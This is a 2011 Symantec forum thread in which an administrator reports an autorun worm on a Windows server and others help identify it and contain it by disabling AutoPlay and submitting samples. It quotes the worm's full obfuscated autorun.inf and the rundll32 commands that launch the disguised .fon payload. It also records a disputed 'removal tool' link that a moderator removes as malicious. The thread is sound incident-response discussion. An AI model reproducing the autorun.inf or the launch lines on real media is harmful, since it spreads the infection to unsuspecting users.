Endpoint Protection

Running SEP version 11.0.6100.645

I was working on a server tonight (Windows Server 2008 R2), and I came across two files called "myporno.avi" and "pornmovs".  A little digging brought up two additional files in the same location, named autorun.inf and setup161.fon

A bit of Googling turned up information that this is the Worm_Otorun.ash worm.  I checked SEP, and it is running and has the latest virus definitions (Thursday, April 14, 2011 r2).  Ran a full scan, but Symantec doesn't return any results.  I see that Trend Labs has a blog post in reference to this worm, but offers no help on getting rid of it besides pushing their own products.  I also tried a custom scan and configured Symantec to examine FON files, but it still finished the search and said it found no threats. 

Has anyone else dealt with this worm lately?  If so, what steps did you take to identify the source, stop the spread, and eliminate it once and for all since Symantec doesn't seem to even detect this problem?  Thanks for your time, and please let me know if I can provide any more information.

Can you get a copy of the autorun.inf so you can view it in a text editor? It should have a filename on it that runs the malware. The .fon file is for a font although it might contain malware. Check if there are unusual running processes. Avi files are known to contain code. So this may be a new one. You may want to check if there are changes in the registry. HKLM\Software\Microsoft\Windows\CurrentVer\Run. Look for suspicious files/processes being loaded.

And send those files to Symantec for analysis.

http://www.symantec.com/business/security_response/submitsamples.jsp

My mistake.  It's actually "myporno.avi.lnk" and "pornmovs.lnk".  Forgot that I had file extensions hidden in the folders.  The target of both of these shortcuts point to the following path: 

C:\WINDOWS\system32\rundll32.exe setup161.fon,23ac91

Here's the contents of the autorun.inf file. 

[otywvfmdtlpowgsx]
gfrhifhylpmyrhgjhculpr=nlrukihekvqlaecjhfuuuihlny
[iwvtulum]
ragpduepbaclycogyfqlodmhqcfsistyljcd=bfwynxoehayshctali
[oickavvapvtmxonwnuciwfthfitityvmyumf]
fkbdwvxmcxjgmeklnrhmxqvqnelesoerxlyr=scvayljifd
[bpwbrielubwfryqxkivjidavypisagfon]
qxqygvla=juyfyxvceqvrkorneelyagedjpgcv
[AutOruN]
actIon=opEN
pcvsuxpmmfpayamjlgtsygwecyhqxirit=kypflrxqmjveosdnyslosohlrrppxe
iCon=%WIndiR%\SysTEm32\sheLl32.DLl,4
hxiqctsitweelhaulvqgndvifmkufcu=vehpkdvsxcdqrfkvwtesfmhncpepypjayjxbcq
UsEAutOPLAy=1
kv=pcoqisfkwtggatcucwclfunglhddupd
opeN=rUNDll32.eXE SETup161.FoN,23Acd0
snqonahexwlcisrppge=edxxemytnqkumjjaskgvgroqdqgfyepkmgaajd
sHEll\eXPloRE\CoMmaND=ruNdLL32.exE seTUp161.foN,23ACd0
tpavwhdmcvupfovpebgukkcbolal=xv
shell\OpEN\comMANd=RUnDLL32.exE SetUp161.fon,23acD0
hxtfssxdyvpjuwnefvediwyddye=ivjdroolbdb

Going to check now to see if any suspicious processes are running.

Your best bet is to disable Autorun/Autoplay first to kill the propagation vehicle.

Then submit the setup*.fon file along with the *.LNK and Autorun file [zip all of them] to the link that mon_raralio advised.

This is possibly a new variant of W32.SillyFDC.BDP
http://www.symantec.com/security_response/writeup.jsp?docid=2011-031106-4835-99

Hi.

Locate this file: SetUp161.fon

Remove it from the system. Give it to Symantec. :D

And disable autorun on all accounts for this server. The inf file if accidentally loaded, would reenable that option on the affected PC.

You should also look into this:

http://www.microsoft.com/technet/security/advisory/967940.mspx

"

Microsoft is announcing the availability of updates to the Autorun feature that help to restrict AutoPlay functionality to only CD and DVD media on supported editions of Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. Restricting AutoPlay functionality to only CD and DVD media can help protect customers from attack vectors that involve the execution of arbitrary code by Autorun when inserting a USB flash drive, network shares, or other non-CD and non-DVD media containing a file system with an Autorun.inf file.

"

Hello,

Please Follow this article and Submit this files to the Symantec Security Response.

I have made a removal tool for this virus. Did it in PHP CLI considering i dont know C++ that good and got hit pretty hard by it at work. All you have to do is extract and run the "run.bat" and let it get to work. If you want to enable scanning for MD5 of the virus edit the settings.ini and change md5 to =1 this will find any traces that may be left behind but will cause it to take much longer.

<edit by Cycletech, link was malicious > http://safeweb.norton.com/report/show?url=http%3A%2F%2Fbluephoenixcs.com

Warning: If anyone clicked the original link in the above post, or downloaded the tool, I recommend deleting the file and running a full scan ASAP.

Thomas (Cycletech)

Update: After further investigation, the removal tool was in fact a trojan threat.

http://www.symantec.com/security_response/writeup.jsp?docid=2005-072717-0748-99

Hi mbenner,

Just judging by the names of the files, that does sound like W32.SillyFDC.BDP.  See http://www.symantec.com/security_response/writeup.jsp?docid=2011-031106-4835-99 for details on this threat.  Definitiosn have been updated against new variants over the past few dayas, so defeintiely make sure you are running the latest defs when you perform a scan.

The following .pdf contains many good recommendations- including a section on autoplay.  Worth reading! "Containing An Outbreak: How to clean your network after an incident"  http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/containing_an_outbreak.pdf

Thanks and best regards,

Mick

you are right about my website, my host was attacked about 6 months ago but was taken care of within 24 hours of me noticing the problem. If you really want to say my removal tool was a virus you really need to check the facts before you say that. Check the MD5 of the php.exe it is a legit file along with all the dll files. As of the .bat it was probably detected because it shuts down core processes that are needed to run the computer that the worm hooks to. Not only that you can view the source code of the entire tool in the .bat and .php file. I was trying to help out and yet you try to make me look like a complete….. If you want the link for further inspection I will be happy to email it to you or someone that really knows what they are looking at. With saying this how do I get symantec to rescan my site? There threats have been removed and taken care of so they are showing false information on my site.  

@ thford89,

I am here to protect our users. If you had someone post a link in your site that was proved malicious, and they also provided a tool that when scanned shows as a Trojan, I think you would do the same thing.

In today's threat landscape, you need to be very careful when downloading free tools and apps, especially when these are being supplied by a new unknown user like yourself.

https://www-secure.symantec.com/connect/user/thford89

For step by step instructions on requesting a re-evaluation of your web site, visit our site owner introduction.

http://safeweb.norton.com/report/show?url=bluephoenixcs.com

Thomas

I fully understand where you are coming from but at that point i would investigate the tool and the site. Symantec is proving false information on my site and will not remove it unless I appeal it which to me should be illegal. I know how often Symantec scans the site and if the files are no longer there the files should no longer be shown on the Symantec site. Webservers are attacked just like any other computer.  The removal tool came up as a false positive just like most of the things that come up when you scan with any type of Symantec tools. If it really wants to say the removal tool was a virus you are saying 95% of the linux webservers are viruses and 75% of windows based web servers are a virus. PHP is used all over the web as a dynamic scripting language. The .bat file did nothing more than link to the php.exe and tell it what to php file to execute. along with using regedit to remove the infected registry values. Again if anyone who knows what they are doing and wants to verify that my removal tool is not a virus and see i am trying to help people out considering big companies will not release any thing that will do it, email me or post on here and i will send the link.

BTW, The removal tool was tagged as a Trojan by scans run from Virus Total, not Symantec.

Understand that I have a process that I must follow.

You can submit the tool for analysis to the Security Response team here - http://www.symantec.com/business/security_response/submitsamples.jsp

Send me the tracking number, once this file shows clean, I will repost here.

Please contact the Safe Web Team to get your site reclassified as Safe.

Best,

Thomas